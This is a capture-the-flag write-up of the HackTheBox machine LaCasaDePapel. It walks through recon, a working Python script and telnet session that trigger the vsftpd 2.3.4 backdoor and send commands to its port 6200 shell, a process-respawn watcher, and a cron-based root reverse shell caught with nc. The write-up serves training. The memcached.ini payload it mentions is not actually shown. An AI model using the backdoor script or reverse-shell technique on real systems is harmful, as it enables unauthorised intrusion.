LaCasaDePapel, a Linux box created by HackTheBox user thek, was an overall easy difficulty box. The login shell was changed to psysh so I couldn't use the vsftpd exploit to get a full shell on the box. LaCasaDePapel has some typical HTB elements: a scavenger hunt for SSH keys, base64 encoding and a cronjob running as root for the final priv esc.
```
# nmap 10.10.10.131 -A
Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-09 02:27 EDT
Nmap scan report for 10.10.10.131
Host is up (0.083s latency).
Not shown: 996 closed ports
PORT    STATE SERVICE  VERSION
21/tcp  open  ftp      vsftpd 2.3.4
22/tcp  open  ssh      OpenSSH 7.9 (protocol 2.0)
| ssh-hostkey:
|   2048 03:e1:c2:c9:79:1c:a6:6b:51:34:8d:7a:c3:c7:c8:50 (RSA)
|   256 41:e4:95:a3:39:0b:25:f9:da:de:be:6a:dc:59:48:6d (ECDSA)
|_  256 30:0b:c6:66:2b:8f:5e:4f:26:28:75:0e:f5:b1:71:e4 (ED25519)
80/tcp  open  http     Node.js (Express middleware)
|_http-title: La Casa De Papel
443/tcp open  ssl/http Node.js Express framework
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_  Server returned status 401 but no WWW-Authenticate header.
| ssl-cert: Subject: commonName=lacasadepapel.htb/organizationName=La Casa De Papel
| Not valid before: 2019-01-27T08:35:30
|_Not valid after:  2029-01-24T08:35:30
| tls-alpn:
|_  http/1.1
```
Neither the website on port 80 nor the one on port 443 presented us with anything useful. Port 80 allowed us to register an account, but the confirmation email was never sent, and port 443 expected a client certificate.
vsftpd 2.3.4 is far more interesting: that version ships a well-known backdoor, triggered by a smiley (`:)`) in the username, which opens a listener on port 6200. Public exploits exist for it (the Metasploit module among them), but the last step always failed for me, so I triggered it manually:
```
$ telnet 10.10.10.131 21
Trying 10.10.10.131...
Connected to 10.10.10.131.
Escape character is '^]'.
220 (vsFTPd 2.3.4)
USER letmein:)
331 Please specify the password.
PASS please
```
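The exchange above, scripted, as an added example that is not part of the original write-up. `trigger_backdoor()` replays the session (banner check, `USER` with the smiley, any `PASS`) and `run_backdoor_command()` then talks to the listener the backdoor spawns. The `FakeVsftpd` class is a constructed stand-in for the vulnerable server, included only so the example runs offline on loopback with ephemeral ports; against the box you would point the two functions at 10.10.10.131 on ports 21 and 6200, and the shell you get is psysh rather than /bin/sh. The constructed `id` reply mirrors the professor account from the write-up.

```python
import socket
import threading

# Greeting of the backdoored release; any other version string means the
# smiley trigger is pointless, so the script refuses to continue.
VULNERABLE_BANNER = b"220 (vsFTPd 2.3.4)"


def banner_is_vsftpd_234(banner: bytes) -> bool:
    """True when the FTP greeting identifies the backdoored vsftpd 2.3.4 build."""
    return banner.strip() == VULNERABLE_BANNER


def trigger_backdoor(host: str, ftp_port: int = 21, timeout: float = 5.0) -> bool:
    """Replay the manual telnet session: USER containing ':)' followed by any PASS.

    Returns True once the server has accepted the smiley username with 331 and the
    PASS has been sent. The backdoor fires on PASS and never answers it, so the
    caller then connects to the listener it opened (port 6200 on a real target).
    """
    with socket.create_connection((host, ftp_port), timeout=timeout) as s:
        f = s.makefile("rb")
        if not banner_is_vsftpd_234(f.readline()):
            return False
        s.sendall(b"USER letmein:)\r\n")
        if not f.readline().startswith(b"331"):
            return False
        s.sendall(b"PASS please\r\n")
        return True


def run_backdoor_command(host: str, backdoor_port: int = 6200,
                         command: bytes = b"id\n", timeout: float = 5.0) -> bytes:
    """Connect to the spawned listener, send one command and collect the reply."""
    with socket.create_connection((host, backdoor_port), timeout=timeout) as s:
        s.sendall(command)
        chunks = []
        try:
            while True:
                data = s.recv(4096)
                if not data:
                    break
                chunks.append(data)
        except socket.timeout:
            pass  # no EOF from a real shell; return what arrived so far
        return b"".join(chunks)


class FakeVsftpd(threading.Thread):
    """Constructed stand-in for the vulnerable server so the example runs offline.

    It speaks just enough FTP to honour the trigger and then serves one command on
    a second port, standing in for the shell the real backdoor spawns on 6200.
    Ports are ephemeral; read them from ftp_port / shell_port.
    """

    def __init__(self):
        super().__init__(daemon=True)
        self.ftp = socket.create_server(("127.0.0.1", 0))
        self.shell = socket.create_server(("127.0.0.1", 0))
        self.ftp_port = self.ftp.getsockname()[1]
        self.shell_port = self.shell.getsockname()[1]

    def run(self):
        conn, _ = self.ftp.accept()
        with conn, conn.makefile("rb") as f:
            conn.sendall(VULNERABLE_BANNER + b"\r\n")
            user = f.readline()
            conn.sendall(b"331 Please specify the password.\r\n")
            f.readline()  # PASS: the real server hangs here and spawns the shell
            if b":)" not in user:
                return
        sh, _ = self.shell.accept()
        with sh:
            sh.recv(1024)  # the command; the reply below is constructed
            sh.sendall(b"uid=1002(professor) gid=1002(professor) groups=1002(professor)\n")


if __name__ == "__main__":
    srv = FakeVsftpd()
    srv.start()
    if trigger_backdoor("127.0.0.1", srv.ftp_port):
        print(run_backdoor_command("127.0.0.1", srv.shell_port).decode())
```

The banner check matters in practice: plenty of hosts answer on 21 with a different vsftpd release, and sending the smiley there only leaves a failed login in the logs.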
After that we can connect to the backdoor on port 6200. We are not granted a normal shell, however: what we get is a Psy Shell (psysh, an interactive PHP REPL). It still lets us read local files through PHP, so we grabbed /etc/passwd, and it also gave us the CA key required to forge the client certificate for port 443:
```
lacasadepapel [~]$ id
uid=1002(professor) gid=1002(professor) groups=1002(professor)
```
Professor's home directory has interesting permissions: the SGID bit is set on it.
After a while spent looking for the privilege escalation, we noticed that the process ID of `/usr/bin/node /home/professor/memcached.js` keeps changing, so something (the root cronjob) constantly restarts this service.
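A respawn loop like this is easy to miss by eyeballing `ps` once. As an added example that is not from the original write-up, the script below diffs two `ps -eo pid,user,args` snapshots and reports every command line whose PID changed; a process that merely exited or appeared is not counted, only one that is present both times under a new PID. The two embedded snapshots are constructed to mirror the box, and `watch()` polls the live `ps` of whatever host it runs on (a procps-style `ps` is assumed).

```python
import subprocess
import time
from collections import defaultdict

# Constructed snapshots in `ps -eo pid,user,args` format, a few seconds apart.
# Only the node process carries a new PID, which is the tell for a respawn loop.
SNAPSHOT_BEFORE = """\
  PID USER     COMMAND
    1 root     /sbin/init
 2345 root     /usr/bin/node /home/professor/memcached.js
 2350 professor psysh
"""
SNAPSHOT_AFTER = """\
  PID USER     COMMAND
    1 root     /sbin/init
 2412 root     /usr/bin/node /home/professor/memcached.js
 2350 professor psysh
"""


def parse_ps(text: str) -> dict:
    """Map (user, command line) -> sorted list of PIDs; the header line is skipped.

    Keying on the full command line rather than the binary keeps different
    services that share an interpreter (several node scripts, say) apart.
    """
    procs = defaultdict(list)
    for line in text.splitlines()[1:]:
        parts = line.split(None, 2)
        if len(parts) < 3:
            continue
        pid, user, args = parts
        procs[(user, args)].append(int(pid))
    return {key: sorted(pids) for key, pids in procs.items()}


def restarted(before: dict, after: dict) -> dict:
    """Command lines present in both snapshots whose PID set changed.

    Returns {(user, args): (old_pids, new_pids)}. Processes that only exited or
    only started are not restarts and are left out.
    """
    return {key: (before[key], after[key])
            for key in before.keys() & after.keys()
            if before[key] != after[key]}


def take_snapshot() -> str:
    """Live snapshot from the local ps; assumes procps-style option handling."""
    return subprocess.run(["ps", "-eo", "pid,user,args"],
                          capture_output=True, text=True, check=True).stdout


def watch(interval: float = 2.0, rounds: int = 5) -> dict:
    """Poll ps and count how often each command line was respawned."""
    prev = parse_ps(take_snapshot())
    counts = defaultdict(int)
    for _ in range(rounds):
        time.sleep(interval)
        cur = parse_ps(take_snapshot())
        for key, (old, new) in restarted(prev, cur).items():
            counts[key] += 1
            print(f"respawned {counts[key]}x: {key[0]} {key[1]} pid {old} -> {new}")
        prev = cur
    return dict(counts)


if __name__ == "__main__":
    sample = restarted(parse_ps(SNAPSHOT_BEFORE), parse_ps(SNAPSHOT_AFTER))
    for key, pids in sample.items():
        print("constructed sample:", key, pids)
    watch()
```

Anything this flags that runs as root from a path you can write to, or from a directory you can rename files in, is a privilege escalation candidate, which is exactly the situation with memcached.js and its ini file here.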
Those files live in our home directory, and since we have write access to the directory that holds them, we can simply move them away and create new files in their place, even without being able to edit the originals. We created memcached.ini.new with the following content:
memcached.ini
```
nc -lvnp 4444
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.10.131.
Ncat: Connection from 10.10.10.131:43525.
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
cd /root
ls
root.txt
cat root.txt
586979....
```
So we have root, and with root permissions we can read user.txt as well as root.txt.